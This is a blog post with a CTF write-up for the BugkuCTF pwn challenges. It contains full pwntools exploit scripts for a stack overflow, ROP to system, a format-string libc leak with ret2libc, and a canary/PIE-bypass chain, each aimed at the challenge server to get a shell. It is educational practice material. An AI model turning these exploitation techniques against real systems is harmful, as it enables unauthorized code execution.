BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】

最新推荐文章于 2023-04-01 18:28:56 发布
最新推荐文章于 2023-04-01 18:28:56 发布
阅读量9.2k 收藏 33
点赞数 8
文章标签: BugkuCTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kety_gz/article/details/100516666
版权

buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3
这些题目的libc

pwn1

nc连接后直接就有执行权限

ls
cat flag

得到flag

pwn2

下载文件放入ida
在这里插入图片描述
有一个有shell,我们只需要将程序跳转到这里
选择main F5查看代码
在这里插入图片描述
看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为get_shell_的地址就可以得到flag。
s的地址是rbp-30,64位的返回地址通常是rbp+8,二者相差0x38,所以我们只要发送0x38个字符+get_shell的地址就可以得到flag
exp

from pwn import *

sh = remote("114.116.54.89", 10003)

print sh.recv()
payload="A" * 0x38 + p64(0x400751)
sh.sendline(payload)
sh.interactive()

pwn4

在这里插入图片描述
sub_400751中虽然调用了system,但参数不是"/bin/sh",无法获得shell。所以需要我们自己构造shell
将"/bin/sh"作为参数传给system函数,然后调用。在ida的数据段搜索"/bin/sh",找不到,但是可以找到“$0”,也可以得到shell。
在这里插入图片描述
"$0"的地址为0x60111f。由于64的程序的参数不在栈中,而是在寄存器中(前六个参数分别位于 rdi,rsi,rdx,rcx,r8,r9)
所以我们要传参还需要将栈中的数据pop到rdi中。
我们把程序放到kali中,利用ROPgadget搜索pop rdi; ret;这样的汇编代码,需要输入这样的命令

ROPgadget --binary pwn4 --only "pop|ret" | grep "rdi"

在这里插入图片描述
得到pop_rdi_ret的地址为0x4007d3
然后利用main函数中的变量s进行溢出
在这里插入图片描述
exp

from pwn import *

p = remote("114.116.54.89" ,10004)

system = 0x400570
pop_rdi_ret = 0x4007d3
bin_sh = 0x60111F

p.recvuntil('pwn me\n')
payload = 'a' * (0x10 + 8) 
payload += p64(pop_rdi_ret) 
payload += p64(bin_sh) 
payload += p64(system)
p.sendline(payload)
p.interactive()

pwn5

在这里插入图片描述
没有system,需要返回到libc。
在这里插入图片描述
变量s存在溢出,且要避免执行exit();查看if中比较的两个字符串,一个是“真香”,一个是“鸽子”,也就是说输入字符串s中要同时存在这两个词。
printf()存在格式化字符串漏洞,我们可以读取main函数返回地址,借此计算libc的基址。(这个题应该给出libc文件的,但是没有给,我们可以读pwn4题的libc,应该是一样的)
把libc文件放在ida中,找到_libc_start_main函数中调用main函数的地方,查看地址
在这里插入图片描述
这个main的返回地址就=libc基址+0x2082E(这个call rax的偏移地址) + 2(call rax的长度为2)
利用ROPgadget
查libc的system函数偏移地址0x45390
查libc的"/bin/sh"字符串偏移地址0x18cd57
查human的pop_rdi_ret地址0x400933
libc中函数的实际地址=libc基址 + 函数偏移地址
exp

#coding:utf-8
from pwn import *

p = remote("114.116.54.89", "10005")

pop_rdi = 0x400933
bin_add = 0x18cd57
sys_add = 0x45390
gezi = "鸽子"
zhenxiang = "真香"

print p.recvuntil("?\n")
p.sendline("%11$p.")
print p.recvline()
libc_leak = int(p.recvline()[2:-2],16)
libc_base = libc_leak - 0x20830
print p.recvuntil("还有什么本质?")
bin_abs = libc_base + bin_add
sys_abs = libc_base + sys_add
payload = (gezi+zhenxiang).ljust(0x20+8,"A")
payload += p64(pop_rdi)
payload += p64(bin_abs)
payload += p64(sys_abs)
p.sendline(payload)
p.interactive()

pwn3

checksec一下
在这里插入图片描述
全开,有点吓人,不慌,拖进ida

没有system,需要用libc构造shell,有canary保护,需要读canary的值,随机地址,需要读程序基址。
在这里插入图片描述
利用thinking_note进行栈溢出,每次利用第一个read和puts获取一个值,第二个read恢复栈并跳回main。
在这里插入图片描述
第一步读取canary,也就是栈中的var_8,canary的最低位通常是0x00,所以要将其覆盖(puts函数遇到0x00会停止),第一次写栈从ebp-260写到ebp-7,读出var_8,第二次将var_8写到对应位置,继续覆盖,并让r的最低位变为0x20,这样程序就能返回到main函数,
第二步读取vul的返回地址,第一次写栈到ebp+8(canary要仍要写到var_8对应的位置,不然程序会停止),读到返回地址r,然后减去0xd2e(ida中看到的vul的返回地址)
第三步读取libc基址
libc基址根据main函数的返回地址计算(方法和pwn5中一样),那么我们怎么找到main函数返回地址的位置呢?
在这里插入图片描述
main函数在call vul之前只有push rbp会影响栈,而我们在前两步分别多执行了一次push rbp,所以一共是执行了三次,那么现在main函数返回地址的位置应该和vul函数返回地址的位置相差0x8*4,也就是ebp+0x28.
然后就可以计算libc基址构造shell 了
exp

from pwn import *

p = remote("114.116.54.89", 10000)

val_add = 0xd2e
pop_rdi_add = 0xe03
puts_plt_add = 0x8b0
puts_got_add = 0x202018
start_add = 0xd20

print p.recvuntil("path:")
p.sendline("flag")
print p.recvuntil("len:")
p.sendline("1000")
payload = "A" * (0x260-8)+"B"
p.send(payload)
print p.recvuntil("B")
canary = u64(p.recv(7).rjust(8,"\x00"))
print "cancay:", hex(canary)
x = p.recvline()

p.recvuntil("(len is 624)\n")
payload = "A" * (0x260-8) 
payload += p64(canary)
payload += p64(0)
payload += "\x20"
p.send(payload)

print p.recvuntil("path:")
p.sendline("flag")
print p.recvuntil("len:")
p.sendline("1000")
payload = "A" * (0x260+7)+"B"
p.send(payload)
print p.recvuntil("B")
x = p.recvline()
val = u64(x[:-1].ljust(8,"\x00"))
print "val:", hex(val)
elf_base = val - val_add
print hex(elf_base)
p.recvuntil("(len is 624)\n")
payload = "A" * (0x260-8) 
payload += p64(canary)
payload += p64(0)
payload += "\x20"
p.send(payload)

puts_plt = elf_base + puts_plt_add
puts_got = elf_base + puts_got_add
pop_rdi = elf_base + pop_rdi_add
start = elf_base + start_add

p.recvuntil("path:")
p.sendline("flag")
p.recvuntil("len:")
p.sendline("1000")
payload = "A" * (0x260 + 8*5-1)+"B" 
p.send(payload)
p.recvuntil("B")
x = p.recvuntil("please")
print x
start_abs = u64(x[:8].split("\n")[0].ljust(8,"\x00"))
libc_base = start_abs - 0x20830
print hex(start_abs)
p.recvuntil("(len is 624)\n")
payload = "A" * (0x260-8) 
payload += p64(canary)
payload += p64(0)
payload += p64(start)
p.send(payload)

bin_add = 0x18cd57
sys_add = 0x45390

bin_abs = libc_base + bin_add
sys_abs = libc_base + sys_add

p.recvuntil("path:")
p.sendline("flag")
p.recvuntil("len:")
p.sendline("1000")
payload = "A" * (0x260-8)
payload += p64(canary)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(bin_abs)
payload += p64(sys_abs)
payload += p64(start)

p.send(payload)
p.recv()
p.recvuntil("(len is 624)\n")
payload = "A"
p.send(payload)
p.interactive()

以上,如有错误,欢迎指正,如有疑问,欢迎提问。

橘小白
关注
  • 8
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 26
    评论
[BUGKU][CTF][PWN][2020] PWN writeup
dadongwudi的博客
01-12 595
PWN1 关键字:nc 知识点:nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6,而且可以为用户提供无限的潜在用途。 在nc的大量功能中,有能力将nc链接在一起;TCP、UDP和到其他站点的SCTP端口;支持
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1488
Bugku的pwn题中,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
bugku pwn libc
09-03
bugku pwn3pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
BugkuCTF pwn pwn1
H4ppyD0g的博客
08-17 1279
1 pwn1 ubuntu下输入 nc 114.116.54.89 10001 然后ls查看该目录下文件,发现有flag文件, cat flag 获取flag。 nc 主机的ip或域名端口号 作用是建立于对应ip或端口的链接,相当于一个后门web shell,可以进行访问等操作。 nc的作用还有很多,这里只是最简单的应用。 ...
bugku pwn1
PRCORANGE的博客
04-13 213
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
Bugku pwn 1--wp
weixin_45427676的博客
03-25 395
打开题目之后发现只有: nc 114.116.54.89 10001 那就好处理了,直接在VM中执行这句命令。 这句命令什么意思呢?我一开始也不晓得,pwn题里面都有,所以还是要清楚的。 nc + ip地址 + 端口号(nc命令用于设置路由器) nc即netcat,是一个网络工具(Linux自带),有IP地址和端口号,就可以连接路由器,连接成功后,目标主机会运行题目文件,进行交互。一般还会有一...
bugku pwn5
发蝴蝶和大脑斧的博客
07-17 1612
参考writeup 首先发现第一次输入存在格式化字符串漏洞,泄露出栈上的__libc_start_main。这个是在start函数中入栈的,应该是每个程序都会进入main函数之前进行的操作。__libc_start_main是libc中的函数,可以泄露出加载libc的基地址。然后就是找服务器system地址和binsh地址,通过gadget赋值。 # -*- coding: utf-8 -*- f...
BugkuCTF练习平台pwn5(human)的writeup
只影的博客
03-04 936
这道题的思路相对简单,但是比较有代表性。 首先查看防护机制,发现只打开了NX。用ida打开题目,发现中文无法识别为字符串。这里需要用命令行打开ida,新建bat并编辑内容为D:\IDA_Pro_v7.0\ida64.exe -dCULTURE=all human即可。 漏洞有两处,第一处比较明显,是格式化字符串漏洞,如下所示。 memset(&s, 0, 0x20uLL); put...
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 638
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku-pwn-wp
令则
03-27 449
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
bugku pwn3
doudoudedi
10-11 760
这道题不算太难多次返回main函数就可以了,第一次就leak出canary然后修改最低位就可以返回main函数第二次我们leak出程序的基址再次返回main函数第三次函数我们泄露出libc最后一处返回main函数我们就可以getshell了 exp: from pwn import * from LibcSearcher import * #p=process('./read_note') p=r...
[BUGKU] [PWN] PWN1
Stan冲冲冲
05-18 331
[BUGKU] [PWN] PWN1 PWN1 nc 114.116.54.89 10001 直接nc过去,ls即可看到文件,发现flag,cat即可发现flag cat flag
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1370
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
Bugku PWN Easy_int
最新发布
JEWSWS的博客
04-01 369
【春风不解语,独做狮子吟。】
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 709
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
Bugku pwn4
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-24 278
准备: 可以看到程序没有开任何的保护 运行测试了一下,有一个输入数据的点 IDA 定位到主函数,很明显这里的 s 可以作为溢出的点 浏览了一下找到了system函数,kaix… 找找rop点,查看一下字符串 刚开始也很懵逼,找了一下/bin/bash 没找到,去看了wp,原来这里的$0也是可以利用的,system('/bin/bash')和system('$0')的效果是一样的。 这样我们就可以借用'$0'来溢出拿到shell OK现在我们有...
评论 26
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值